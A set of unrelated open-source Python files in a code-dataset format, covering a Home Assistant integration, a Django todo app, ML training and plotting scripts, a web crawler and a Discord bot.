\"\"\"\n session = aiohttp_client.async_get_clientsession(hass)\n async with session.get(f'http://{data[\"host\"]}:{data[\"port\"]}/state/all') as resp:\n if resp.status == 200:\n pass\n else:\n raise CannotConnect\n\n return {\"title\": \"njsPC-HA\"}\n\n\nclass ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):\n \"\"\"Handle a config flow for njsPC-HA.\"\"\"\n\n VERSION = 1\n\n def __init__(self) -> None:\n \"\"\"Initialize.\"\"\"\n self.zero_conf = None\n self.host = None\n self.port = None\n self.server_id = None\n self.controller_name = None\n\n async def async_step_user(\n self, user_input: dict[str, Any] | None = None\n ) -> FlowResult:\n \"\"\"Handle the initial step.\"\"\"\n if user_input is None:\n return self.async_show_form(\n step_id=\"user\", data_schema=STEP_USER_DATA_SCHEMA\n )\n\n errors = {}\n\n try:\n info = await validate_input(self.hass, user_input)\n self.server_id = f'njspcha_{user_input[CONF_HOST].replace(\".\", \"\")}{user_input[CONF_PORT]}'\n await self.async_set_unique_id(self.server_id)\n self._abort_if_unique_id_configured()\n except CannotConnect:\n errors[\"base\"] = \"cannot_connect\"\n except Exception: # pylint: disable=broad-except\n _LOGGER.exception(\"Unexpected exception\")\n errors[\"base\"] = \"unknown\"\n else:\n return self.async_create_entry(title=info[\"title\"], data=user_input)\n\n return self.async_show_form(\n step_id=\"user\", data_schema=STEP_USER_DATA_SCHEMA, errors=errors\n )\n\n async def async_step_zeroconf(\n self, discovery_info: zeroconf.ZeroconfServiceInfo\n ) -> FlowResult:\n \"\"\"Handle zeroconf discovery.\"\"\"\n self.zero_conf = discovery_info\n self.server_id = (\n f'njspcha_{discovery_info.host.replace(\".\", \"\")}{discovery_info.port}'\n )\n # Do not probe the device if the host is already configured\n self._async_abort_entries_match(self.server_id)\n\n # Check if already configured\n await self.async_set_unique_id(self.server_id)\n self._abort_if_unique_id_configured()\n self.context.update(\n {\n \"title_placeholders\": {\n CONF_HOST: discovery_info.host,\n CONF_PORT: discovery_info.port,\n },\n }\n )\n return await self.async_step_zeroconf_confirm()\n\n async def async_step_zeroconf_confirm(\n self, user_input: dict[str, Any] = None\n ) -> FlowResult:\n \"\"\"Handle a flow initiated by zeroconf.\"\"\"\n if user_input is not None:\n data = {\n CONF_HOST: self.zero_conf.host,\n CONF_PORT: self.zero_conf.port,\n }\n return self.async_create_entry(title=\"njsPC-HA\", data=data)\n return self.async_show_form(\n step_id=\"zeroconf_confirm\",\n data_schema=vol.Schema({}),\n description_placeholders={\n CONF_HOST: self.zero_conf.host,\n CONF_PORT: self.zero_conf.port,\n },\n )\n\n async def async_step_ssdp(self, discovery_info: ssdp.SsdpServiceInfo) -> FlowResult:\n \"\"\"Handle a flow initialized by SSDP discovery.\"\"\"\n self.host = urlparse(discovery_info.ssdp_location).hostname\n self.port = urlparse(discovery_info.ssdp_location).port\n self.server_id = f'njspcha_{self.host.replace(\".\", \"\")}{self.port}'\n await self.async_set_unique_id(self.server_id)\n self._abort_if_unique_id_configured()\n self.controller_name = discovery_info.upnp.get(\n ssdp.ATTR_UPNP_FRIENDLY_NAME, self.host\n )\n self.context.update(\n {\n \"title_placeholders\": {\n \"name\": self.controller_name,\n CONF_HOST: self.host,\n CONF_PORT: self.port,\n },\n }\n )\n return await self.async_step_ssdp_confirm()\n\n async def async_step_ssdp_confirm(\n self, user_input: dict[str, Any] = None\n ) -> FlowResult:\n \"\"\"Handle a flow initiated by zeroconf.\"\"\"\n if user_input is not None:\n data = {\n CONF_HOST: self.host,\n CONF_PORT: self.port,\n }\n return self.async_create_entry(title=\"njsPC-HA\", data=data)\n return self.async_show_form(\n step_id=\"ssdp_confirm\",\n data_schema=vol.Schema({}),\n description_placeholders={\n \"name\": self.controller_name,\n CONF_HOST: self.host,\n CONF_PORT: self.port,\n },\n )\n\n\nclass CannotConnect(HomeAssistantError):\n \"\"\"Error to indicate we cannot connect.\"\"\"\n","repo_name":"Crewski/njsPC-HA","sub_path":"custom_components/njspc_ha/config_flow.py","file_name":"config_flow.py","file_ext":"py","file_size_in_byte":5832,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"23954437874","text":"from django.shortcuts import render, get_object_or_404, redirect\n\nfrom todo_list.forms import TaskForm\nfrom todo_list.models import *\n\n# Create your views here.\ndef bienvenido(request):\n tasks = Task.objects.order_by('id')\n if request.method == 'POST':\n formaTask = TaskForm(request.POST)\n if formaTask.is_valid():\n formaTask.save()\n return redirect('index')\n else:\n formaTask = TaskForm()\n return render(request, 'bienvenido-prueba.html', {'formaTask': formaTask, 'tasks': tasks})\n\ndef new(request):\n if request.method == 'POST':\n formaTask = TaskForm(request.POST)\n if formaTask.is_valid():\n formaTask.save()\n return redirect('index')\n else:\n formaTask = TaskForm()\n return render(request, 'new.html', {'formaTask':formaTask})\n\ndef edit(request, id):\n task = get_object_or_404(Task, pk=id)\n if request.method == 'POST':\n formaTask = TaskForm(request.POST, instance = task)\n if formaTask.is_valid():\n formaTask.save()\n return redirect('index')\n else:\n formaTask = TaskForm(instance=task)\n return render(request, 'edit.html', {'formaTask':formaTask})\n\n\ndef delete(request, id):\n task = get_object_or_404(Task, pk=id)\n if task:\n task.delete()\n return redirect('index')\n\n","repo_name":"nicookazan/DjangoTodolist","sub_path":"todo_list/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25985046309","text":"# -*- coding: utf-8 -*-\n\"\"\"\nProcess result directories\n\n@author: thomas\n\"\"\"\n\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nfrom cycler import cycler\nplt.style.use('ggplot')\nmpl.rcParams['lines.linewidth'] = 5\nlines = [\"-\",\"--\",\"-.\",\":\"]\ncolours = ['r','g','b','y','k','w']\nplt.rc('axes', prop_cycle=(cycler('color', ['r', 'g', 'b', 'y','c','m','k','w']*2) +\n cycler('linestyle', [i for i in ['-', '--'] for j in range(8)])))\nimport os\nimport numpy as np\nimport sys\nimport shutil\nfrom hps import get_hps\n\ndef make_name(basename='',item1=None,val1=None,item2=None,val2=None,item3=None,val3=None,item4=None,val4=None,separator='-'):\n name = basename\n if item1 is not None:\n name += '{}:{}'.format(item1,val1)\n if item2 is not None:\n name += separator + '{}:{}'.format(item2,val2)\n if item3 is not None:\n name += separator + '{}:{}'.format(item3,val3)\n if item4 is not None:\n name += separator + '{}:{}'.format(item4,val4)\n return name\n\ndef get_subdirs(a_dir):\n return [name for name in os.listdir(a_dir)\n if os.path.isdir(os.path.join(a_dir, name))]\n\ndef process(base_result_dir,overview_dir,rep_dir):\n print('Processing folder {}'.format(base_result_dir))\n\n # load hps associated with this folder\n try: \n with open(base_result_dir + '/hps_raw.txt', 'r') as f:\n hps_list = f.read() \n hps = get_hps().parse(hps_list)\n except Exception as e:\n print('Base experiment folder {} with error {}'.format(base_result_dir,e))\n print('Removing empty folder {}'.format(base_result_dir))\n shutil.rmtree(base_result_dir)\n return\n \n # Set-up plots \n ep_run_plot = xy_subplot(xlabel='episodes',ylabel='Episode reward',row_item=hps.item4,row_seq=hps.seq4,col_item=hps.item3,col_seq=hps.seq3)\n# av_run_plot = xy_subplot(xlabel='episodes',ylabel='Average reward',row_item=hps.item4,row_seq=hps.seq4,col_item=hps.item3,col_seq=hps.seq3) \n# Qsa_run_plot = xy_subplot(xlabel='episodes',ylabel='Qsa norm',row_item=hps.item4,row_seq=hps.seq4,col_item=hps.item3,col_seq=hps.seq3) \n# grad_run_plot = xy_subplot(xlabel='episodes',ylabel='Gradient norm',row_item=hps.item4,row_seq=hps.seq4,col_item=hps.item3,col_seq=hps.seq3) \n# loss_run_plot = xy_subplot(xlabel='episodes',ylabel='Loss',row_item=hps.item4,row_seq=hps.seq4,col_item=hps.item3,col_seq=hps.seq3) \n\n # load in all data\n all_empty = True\n for it1,item1 in enumerate(hps.seq1):\n for it2,item2 in enumerate(hps.seq2):\n for it3,item3 in enumerate(hps.seq3):\n for it4,item4 in enumerate(hps.seq4): \n result_dir = base_result_dir + '/subplots/'\n if hps.loop_hyper:\n result_dir += make_name('',hps.item1,item1,hps.item2,item2,hps.item3,item3,hps.item4,item4) + '/'\n\n if not os.path.exists(result_dir):\n continue\n \n #ep_R_plot = xy_plot(ylabel='Episode reward',xlabel='episodes')\n #av_R_plot = xy_plot(ylabel='Average reward',xlabel='episodes')\n ep_c,ep_R_c,av_R_c,Qsa_c,grad_c,loss_c = np.array([]),np.array([]),np.array([]),np.array([]),np.array([]),np.array([])\n\n for rep in range(hps.n_rep):\n read_dir = result_dir + 'rep:{}'.format(rep) + '/'\n if not os.path.exists(read_dir):\n continue\n\n # Load raw data\n try:\n eps = np.loadtxt(read_dir+'episode_raw.txt') \n ep_R = np.loadtxt(read_dir+'ep_reward_raw.txt')\n\n if (len(eps)>0) and (len(ep_R)>0):\n # sometimes a txt get accidently empty due to a time limit when writing\n ep_c = np.append(ep_c,eps)\n ep_R_c = np.append(ep_R_c,ep_R)\n\n all_empty = False\n\n #av_R = np.loadtxt(read_dir+'av_reward_raw.txt')\n #Qsa_norm = np.loadtxt(read_dir+'Qsa_norm_raw.txt')\n #grad_norm = np.loadtxt(read_dir+'grad_norm_raw.txt')\n #loss = np.loadtxt(read_dir+'loss_raw.txt')\n except Exception as e:\n print(e)\n continue\n \n #av_R_c = np.append(av_R_c,av_R)\n #Qsa_c = np.append(Qsa_c,Qsa_norm)\n #grad_c = np.append(grad_c,grad_norm)\n #loss_c = np.append(loss_c,loss)\n\n \n # Finish repetition plots\n #ep_R_plot.finish()\n #av_R_plot.finish()\n #ep_R_plot.save(result_dir+'episode_reward')\n #av_R_plot.save(result_dir+'average_reward')\n\n if len(ep_c) == 0 or len(ep_R_c) == 0:\n print('empty {}, skipping folder'.format(base_result_dir))\n ep_c = np.array([0,1])\n ep_R_c = np.array([0,0])\n \n # Do smoothing over repetitions\n ep_run,ep_R_run = downsample_smooth(ep_c,ep_R_c,down_len=1000,window=50)\n \n np.savetxt(result_dir+'episode_run.txt',ep_run,fmt='%.3g') \n np.savetxt(result_dir+'ep_reward_run.txt',ep_R_run,fmt='%.3g') \n\n label = make_name('',hps.item1,item1,hps.item2,item2)\n \n max_ep = 10000\n ep_R_run = ep_R_run[ep_run<max_ep]\n ep_run = ep_run[ep_run<max_ep] \n ep_run_plot.add(x=ep_run,y=ep_R_run,row=it4,col=it3,label=label) \n \n# try: \n# ep_run,ep_R_run,av_R_run,Qsa_run,grad_run,loss_run = downsample_smooth(ep_c,ep_R_c,av_R_c,Qsa_c,grad_c,loss_c,down_len=1000,window=50)\n# np.savetxt(result_dir+'av_reward_run.txt',av_R_run,fmt='%.3g')\n# np.savetxt(result_dir+'Qsa_run.txt',Qsa_run,fmt='%.3g') \n# np.savetxt(result_dir+'grad_run.txt',grad_run,fmt='%.3g') \n# np.savetxt(result_dir+'loss_run.txt',loss_run,fmt='%.3g') \n#\n#\n# # add to the higher level plot\n# label = make_name('',hps.item1,item1,hps.item2,item2)\n# av_run_plot.add(x=ep_run,y=av_R_run,row=it4,col=it3,label=label)\n# Qsa_run_plot.add(x=ep_run,y=Qsa_run,row=it4,col=it3,label=label)\n# grad_run_plot.add(x=ep_run,y=grad_run,row=it4,col=it3,label=label)\n# loss_run_plot.add(x=ep_run,y=loss_run,row=it4,col=it3,label=label) \n# except:\n# pass\n #try:\n # Qsa_run = downsample_smooth(ep_c,ep_R_c,av_R_c,down_len=1000,window=50)\n # np.savetxt(result_dir+'Qsa_norm_run.txt',Qsa_run,fmt='%.3g') \n # Qsa_run_plot.add(x=ep_run,y=Qsa_run,row=it4,col=it3,label=label) \n #except:\n # pass\n if all_empty:\n print('Removing empty folder {}'.format(base_result_dir))\n shutil.rmtree(base_result_dir)\n else:\n ep_run_plot.finish()\n ep_run_plot.save(base_result_dir+'/Episode_reward_running',close=False)\n ep_run_plot.save(overview_dir+'Episode_reward/{}_{}_{}'.format(hps.game,hps.name,rep_dir))\n# av_run_plot.finish()\n# av_run_plot.save(base_result_dir+'/Average_reward_running',close=False)\n# av_run_plot.save(overview_dir+'Average_reward/{}_{}_{}'.format(hps.game,hps.name,rep_dir))\n# Qsa_run_plot.finish()\n# Qsa_run_plot.save(base_result_dir+'/Qsa_norm_running',close=False)\n# Qsa_run_plot.save(overview_dir+'Qsa_norm/{}_{}_{}'.format(hps.game,hps.name,rep_dir))\n# grad_run_plot.finish()\n# grad_run_plot.save(base_result_dir+'/grad_norm_running',close=False)\n# grad_run_plot.save(overview_dir+'grad_norm/{}_{}_{}'.format(hps.game,hps.name,rep_dir))\n# loss_run_plot.finish()\n# loss_run_plot.save(base_result_dir+'/loss_running',close=False)\n# loss_run_plot.save(overview_dir+'loss/{}_{}_{}'.format(hps.game,hps.name,rep_dir))\n\n\n # Mark this folder as processed\n #os.rename(base_result_dir,base_result_dir+'d')\n print('Processed folder')\n\ndef plot_result_array(result_array,result_name=None,item1=None,seq1=[None],item2=None,seq2=[None],item3=None,seq3=[None],item4=None,seq4=[None]):\n ''' result_array expects a single result in each entry in the (up to) 4D array'''\n\n #while result_array.ndim < 4:\n # result_array = np.expand_dims(result_array,-2)\n item_len = result_array.shape \n x_range = np.arange(1,item_len[0]+1)\n col_size = item_len[2]\n row_size = item_len[3] \n \n fig,ax = plt.subplots(nrows=row_size,ncols=col_size,sharex=True,sharey=True)\n fig.set_figheight(row_size*7)\n fig.set_figwidth(col_size*7)\n for k in range(row_size):\n for j in range(col_size):\n try:\n if ax.ndim == 2:\n col = ax[k,j]\n elif ax.ndim == 1:\n col = ax[j]\n except:\n col = ax\n for l in range(item_len[1]):\n if item2 is not None:\n col.plot(x_range,result_array[:,l,j,k],markersize=10,mew=5,marker='x',label='{} = {}'.format(item2,seq2[l]))\n else:\n col.plot(x_range,result_array[:,l,j,k],markersize=10,mew=5,marker='x') \n if item3 is not None and item4 is not None:\n col.set_title('{} = {}, {} = {}'.format(item3,seq3[j],item4,seq4[k]),fontsize=15)\n elif item3 is not None:\n col.set_title('{} = {}'.format(item3,seq3[j]),fontsize=15)\n if item1 is not None:\n col.set_xlabel(item1,fontsize=15)\n if result_name is not None:\n col.set_ylabel(result_name,rotation=90,fontsize=15) \n col.set_xticks(x_range)\n col.set_xlim([x_range[0]-0.3,x_range[-1]+0.3])\n col.set_xticklabels(seq1,fontsize=15)\n #col.ticklabel_format(style='sci', axis='x', scilimits=(-3,3))\n col.ticklabel_format(style='sci', axis='y', scilimits=(-3,3))\n #format_ticks(col,'x')\n #format_ticks(col,'y')\n col.legend(loc=0,fontsize=15)\n fig.tight_layout()\n\ndef downsample_smooth(ep_c,*args,down_len=500,window=50):\n # Sort\n out = sort_xy(ep_c,*args)\n \n # Downsample\n for i in range(len(out)):\n out[i] = downsample(out[i],down_len)\n\n # Smooth\n if len(out[0]) < window: \n window = 1 # only for debugging, can't average short curves\n for i in range(1,len(out)):\n out[i] = running_mean(out[i],window)\n out[0] = out[0][(window-1):] \n \n return out\n\ndef downsample(x,out_len=1000):\n # recursively downsample array x by halving it\n # The out_len will be between out_len and 2*out_len\n if x.ndim == 0:\n x = x[None]\n elif x.ndim>1:\n x = np.squeeze(x)\n while len(x)>2*out_len:\n if is_odd(len(x)):\n x = x[:-1] # remove last item\n x = np.squeeze(np.mean(np.reshape(x,[-1,2]),axis=1))\n return x\n\ndef running_mean(x,window=50):\n return np.convolve(x, np.ones((window,))/window, mode='valid')\n\ndef is_odd(num):\n return bool(num & 1)\n\ndef sort_xy(x,*args):\n x = x[:-1]\n x_order = np.argsort(x)\n out = [x[x_order]]\n for arg in args:\n out.append(arg[x_order])\n return out\n\nclass xy_plot():\n def __init__(self,title=None,xlabel=None,ylabel=None):\n self.fig,self.ax=plt.subplots()\n if title is not None: self.ax.set_title(title)\n if xlabel is not None: self.ax.set_xlabel(xlabel)\n if ylabel is not None: self.ax.set_ylabel(ylabel)\n\n def add(self,x,y):\n self.ax.plot(x,y)\n \n def finish(self):\n self.ax.ticklabel_format(style='sci', axis='x', scilimits=(-3,3))\n self.ax.ticklabel_format(style='sci', axis='y', scilimits=(-3,3))\n self.ax.autoscale()\n self.fig.tight_layout()\n\n def save(self,save_dir):\n plt.figure(self.fig.number)\n plt.savefig('{}.png'.format(save_dir),bbox_inches=\"tight\")\n plt.close()\n\nclass xy_subplot():\n def __init__(self,xlabel=None,ylabel=None,row_item=None,row_seq=[None],col_item=None,col_seq=[None]):\n self.row_size = row_size = len(row_seq)\n self.col_size = col_size = len(col_seq)\n self.fig,self.ax=plt.subplots(nrows=row_size,ncols=col_size,sharex=True,sharey=True)\n self.fig.set_figheight(row_size*9)\n self.fig.set_figwidth(col_size*9)\n for i in range(row_size):\n for j in range(col_size):\n try:\n if self.ax.ndim == 2:\n col = self.ax[i,j]\n elif self.ax.ndim == 1:\n col = self.ax[j]\n except:\n col = self.ax\n if xlabel is not None:\n col.set_xlabel(xlabel,fontsize=15)\n if ylabel is not None:\n col.set_ylabel(ylabel,fontsize=15)\n if row_item is not None and col_item is not None:\n col.set_title('{} = {}, {} = {}'.format(col_item,col_seq[j],row_item,row_seq[i]),fontsize=15)\n elif col_item is not None:\n col.set_title('{} = {}'.format(col_item,col_seq[j]),fontsize=15)\n\n def add(self,x,y=None,row=0,col=0,label=''):\n try:\n if self.ax.ndim == 2:\n col = self.ax[row,col]\n elif self.ax.ndim == 1:\n col = self.ax[col]\n except:\n col = self.ax\n \n if y is not None:\n col.plot(x,y,label=label,linewidth=5)\n else:\n col.plot(x,label=label,linewidth=5)\n \n def finish(self):\n for i in range(self.row_size):\n for j in range(self.col_size):\n try:\n if self.ax.ndim == 2:\n col = self.ax[i,j]\n elif self.ax.ndim == 1:\n col = self.ax[j]\n except:\n col = self.ax\n #format_ticks(col,'x')\n #format_ticks(col,'y')\n col.ticklabel_format(style='sci', axis='x', scilimits=(-3,3))\n col.ticklabel_format(style='sci', axis='y', scilimits=(-3,3))\n y_lim = list(col.get_ylim())\n y_lim[0] -= (y_lim[1]-y_lim[0])/50\n y_lim[1] += (y_lim[1]-y_lim[0])/50 \n col.set_ylim(y_lim)\n if (j+1) == self.col_size and (i == 0): \n col.legend(loc='upper left',bbox_to_anchor=(1.04,1),ncol=1,fontsize=15)\n self.fig.tight_layout()\n\n def save(self,save_dir,close=True):\n plt.figure(self.fig.number)\n plt.savefig('{}.png'.format(save_dir),bbox_inches=\"tight\")\n if close: \n plt.close()\n \ndef format_ticks(ax,axis='x'):\n #ax.autoscale()\n ticks = ax.get_xticks().tolist() if axis == 'x' else ax.get_yticks().tolist()\n #ticks = [format(tick,'.3g') for tick in ticks]\n ax.set_xticklabels(ticks,fontsize=9) if axis == 'x' else ax.set_yticklabels(ticks,fontsize=9)\n\ndef loop_directories(result_dir,overview_dir):\n sub_dirs = get_subdirs(result_dir)\n for game_dir in sub_dirs:\n if 'game' in game_dir:\n name_dirs = get_subdirs(result_dir + game_dir + '/' )\n for name_dir in name_dirs:\n rep_dirs = get_subdirs(result_dir + game_dir + '/' + name_dir + '/')\n for rep_dir in rep_dirs:\n if not 'd' in rep_dir:\n # Need to process this one\n process(result_dir + game_dir + '/' + name_dir + '/' + rep_dir,overview_dir,rep_dir)\n\nif __name__ == \"__main__\": \n folder = 'icml_results' if len(sys.argv) < 2 else sys.argv[1]\n result_folder = '/home/thomas/' + folder + '/'\n print('Start looping through result folder {}'.format(result_folder))\n overview_dir= result_folder+'learning_curves/'\n if not os.path.exists(overview_dir):\n os.makedirs(overview_dir)\n os.makedirs(overview_dir + 'Episode_reward/')\n os.makedirs(overview_dir + 'Average_reward/')\n os.makedirs(overview_dir + 'Qsa_norm/')\n os.makedirs(overview_dir + 'grad_norm/')\n os.makedirs(overview_dir + 'loss/')\n\n loop_directories(result_folder,overview_dir) \n print('Done') \n","repo_name":"tmoer/return_distribution_exploration","sub_path":"process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":17228,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74205038249","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\n# Importing the libraries\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.metrics import accuracy_score\n\n\n# In[3]:\n\n\n\n# Importing the dataset\ndataset = pd.read_csv('Churn_Modelling.csv')\nX = dataset.iloc[:, 3:13]\ny = dataset.iloc[:, 13]\n\n\n# In[4]:\n\n\n\n#Create dummy variables\ngeography=pd.get_dummies(X[\"Geography\"],drop_first=True)\ngender=pd.get_dummies(X['Gender'],drop_first=True)\n\n\n# In[5]:\n\n\n\n## Concatenate the Data Frames\n\nX=pd.concat([X,geography,gender],axis=1)\n\n## Drop Unnecessary columns\nX=X.drop(['Geography','Gender'],axis=1)\n\n\n# In[6]:\n\n\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\n\n# In[7]:\n\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n\n# In[9]:\n\n\n\n\n# Importing the Keras libraries and packages\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LeakyReLU,PReLU,ELU\nfrom keras.layers import Dropout\n\n\n# In[10]:\n\n\ndef tweak_model(classifier,layers,neurons,epochs,model_tweak_count):\n print(\"Model Tweak :\" ,model_tweak_count)\n print(\"Layers Added :\",layers)\n print(\"Neurons Per Layer :\",neurons)\n print(\"Epochs This Layer :\",epochs)\n print(\"********************************\") \n for i in range(layers):\n \n classifier.add(Dense(units = neurons, kernel_initializer = 'he_uniform',activation='relu'))\n return classifier \n\n\n# In[22]:\n\n\n\nneurons = 10\ntrain_acc = 0\nepochs = 90\nlayers = 1 \nflag = 0\nmodel_tweak_count=0\n\n\n\nwhile int(train_acc) < 90:\n if flag ==1 :\n classifer = keras.backend.clear_session()\n neurons = neurons+10\n epochs = epochs+5\n layers=layers+3\n model_tweak_count=model_tweak_count+1\n \n \n classifier = Sequential()\n \n classifier.add(Dense(units = 6, kernel_initializer = 'he_uniform',activation='relu',input_dim = 11))\n \n classifier = tweak_model(classifier,layers,neurons,epochs,model_tweak_count)\n classifier.add(Dense(units = 1, kernel_initializer = 'glorot_uniform', activation = 'sigmoid'))\n classifier.compile(optimizer = 'Adamax', loss = 'binary_crossentropy', metrics = ['accuracy'])\n \n model_history=classifier.fit(X_train, y_train,validation_split=0.1, batch_size = 10, epochs = epochs,verbose=1)\n \n prev_acaccuracy=train_acc\n m_history=model_history.history\n train_acc=m_history['accuracy'][epochs-1] \n train_acc=round(train_acc*100,2)\n \n #prev_acaccuracy=accuracy\n # y_pred = classifier.predict(X_test)\n # y_pred = (y_pred > 0.5) \n # score=accuracy_score(y_pred,y_test)\n \n #accuracy=round(score*100,2)\n print(\"Previous Accuracy:\",prev_acaccuracy)\n print(\"Current Accuracy :\", train_acc)\n print(\"Accuracy Imporved by:\",train_acc-prev_acaccuracy)\n flag=1\n \n \n\n\n# In[ ]:\n\n\nclassifier.save('tweak_model.h5')\n\n","repo_name":"jai8004/Train_ML_Docker","sub_path":"tweak_model.py","file_name":"tweak_model.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22928907605","text":"\"\"\"\nProgrammer: Ben Quiñones\nTask: Write a basic program using inputs and outputs.\nPurpose: This will help you demonstrate your understanding of decisions (if statements) and logic.\n\"\"\"\nprint()\n###############\n## BEGINNING ##\n###############\ndef main():\n end = 0\n start = 0\n gallons = 0\n mpg = 0\n lp100k = 0\n # ^ Variables ^ #\n #################\n\n start = int(input(\"Enter the first odometer reading (in miles): \"))\n end = int(input(\"Enter the second odometer reading (in miles): \"))\n gallons = float(input(\"Enter the amount of fuel used (in gallons): \"))\n mpg = miles_per_gallon(start, end, gallons)\n lp100k = lp100k_from_mpg(mpg)\n\n print(f\"{mpg:.1f} miles per gallon\")\n print(f\"{lp100k:.2f} liters per 100 kilometers\")\n \n pass\n\ndef miles_per_gallon(start_miles, end_miles, amount_gallons):\n mpg = (end_miles - start_miles) / amount_gallons\n # ^ Variables ^ #\n #################\n\n return mpg\n\ndef lp100k_from_mpg(mpg):\n lp100k = 235.215 / mpg\n \"(lp100k) is Liters per 100 kilometers\"\n # ^ Variables ^ #\n #################\n\n return lp100k\n\nmain()\n\n\n#########\n## END ##\n#########\nprint()","repo_name":"qbenji99/CSE111","sub_path":"5_fuel_usage.py","file_name":"5_fuel_usage.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11650872831","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport json\nimport logging\n\nfrom urllib.parse import urljoin\nfrom tqdm import tqdm\n\nfrom requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nfrom bs4 import BeautifulSoup\n\n\ndef is_good_response(resp):\n \"\"\"\n Returns True if the response seems to be HTML, False otherwise.\n \"\"\"\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200\n and content_type is not None\n and content_type.find('html') > -1)\n\n\nclass Clawer(object):\n def __init__(self, parser=BeautifulSoup, parser_feature='html.parser'):\n self.parser = parser\n self.parser_feature = parser_feature\n\n def craw(self, url, rule_fn):\n try:\n with closing(get(url, stream=True)) as resp:\n if is_good_response(resp):\n response = resp.content\n else:\n response = None\n\n except RequestException as e:\n logging.error('Error during requests to {0} : {1}'.format(url, str(e)))\n response = None\n\n parser_ = self.parser(response, self.parser_feature)\n outs = rule_fn(parser_)\n\n return outs\n\n\nif __name__ == '__main__':\n # url = 'https://papers.nips.cc/'\n # crawler = Clawer()\n #\n #\n # def rule_href(parser):\n # outs = []\n # for li in parser.select('li'):\n # href = li.find('a').get('href')\n # if len(href) > 1:\n # outs.append(href)\n # return outs\n #\n #\n # print(crawler.craw(url, rule_href))\n #\n # hrefs = ['/book/advances-in-neural-information-processing-systems-32-2019']\n #\n #\n # def rule_title(parser):\n # outs = []\n # for li in parser.select('li'):\n # for name in li.find('a').text.split('\\n'):\n # if len(name) > 5:\n # outs.append(name.strip())\n # return outs\n #\n #\n # outs = crawler.craw(urljoin(url, hrefs[0]), rule_title)\n #\n # word_dict = {}\n # for out in outs:\n # for word in out.split():\n # try:\n # word_dict[word] += 1\n # except:\n # word_dict[word] = 1\n # with open('word_dict.json', 'w+') as f:\n # json.dump(word_dict, f, indent=4, sort_keys=True,\n # ensure_ascii=False, separators=(',', ': '))\n \"\"\"\n ----\n \"\"\"\n with open('word_dict.json', 'r') as f:\n word_dict = json.load(f)\n word_dict_sort = {k: v for k, v in sorted(word_dict.items(), key=lambda item: item[1])}\n print(word_dict_sort)\n # import matplotlib.pyplot as plt\n # plt.bar(word_dict.keys(), word_dict)\n # plt.show()\n","repo_name":"j-pong/HYnet","sub_path":"utils/crawler/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8287181118","text":"import discord\r\nfrom discord.ext import commands\r\nimport datetime\r\nfrom urllib import parse, request\r\nimport re\r\n\r\n#primero asignamos un prefijo al bot, para poder comunicarse con el.\r\nbot = commands.Bot(command_prefix=\".\", description=\"Bot de Mateo Ifrán.\")\r\n\r\n#ejecutamos el decorador llamado \"command\" que nos permite crear un comando.\r\n@bot.command()\r\n#pero vamos a tener que manejar ese comando con una funcion\r\nasync def botinfo(ctx):\r\n #el async y await es para que espere un momento antes de ejecutarse\r\n embed = discord.Embed(title=\"Bot desarrollado por Mateo Ifrán.\", description=\"Por ahora puedo hacer poco, pero la forma de utilizarme es poniendo un punto como prefijo. Por ejemplo: .mateo \\n \\n Cosas que puedo hacer hasta ahora: \\n \\n -Busco videos de youtube, solo con el comando: .yt /seguido de lo que quieras buscar.\\n \\n -Describo a cada participante del chat 'Bar de manolo'. Solo tenes que poner el prefijo y el nombre del participante. \\n \\n -Se sumar!! Solamente pone: .suma (numeros que quieras sumar separados por un espacio). \\n \\n Con .info puedo mostrarte la información del servidor.\" , timestamp=datetime.datetime.utcnow())\r\n await ctx.send(embed=embed)\r\n\r\n#SUMA\r\n@bot.command()\r\nasync def suma(ctx, numero1: float, numero2: float):\r\n await ctx.send(numero1 + numero2)\r\n#MOSTRAR ESTADISTICAS\r\n@bot.command()\r\nasync def info(ctx):\r\n embed = discord.Embed(title=f\"{ctx.guild.name}\", description=\"Marginados y exiliados, sean bienvenidos.\", timestamp=datetime.datetime.utcnow(), color=discord.Color.blue())\r\n embed.add_field(name=\"Server created at\", value=f\"{ctx.guild.created_at}\")\r\n embed.add_field(name=\"Server Owner\", value=f\"{ctx.guild.owner}\")\r\n embed.add_field(name=\"Server Region\", value=f\"{ctx.guild.region}\")\r\n embed.add_field(name=\"Server ID\", value=f\"{ctx.guild.id}\")\r\n #embed.set_thumbnail(url=) //esto sirve para agregar una imagen\r\n \r\n await ctx.send(embed=embed)\r\n \r\n#COMANDOS DE OPINION HACIA LOS USUARIOS\r\n@bot.command()\r\nasync def mateo(ctx):\r\n await ctx.send(\"Mateo me controla. Estoy obligado a decir que es un genio.\")\r\n@bot.command()\r\nasync def leme(ctx):\r\n await ctx.send(\"Antes se escuchaba el rumor de que se la comía. Pero ahora sabemos que solo se come balas del Cs Go.\")\r\n@bot.command()\r\nasync def rodri(ctx):\r\n await ctx.send(\"El viejo es un tierno, pero se hace el 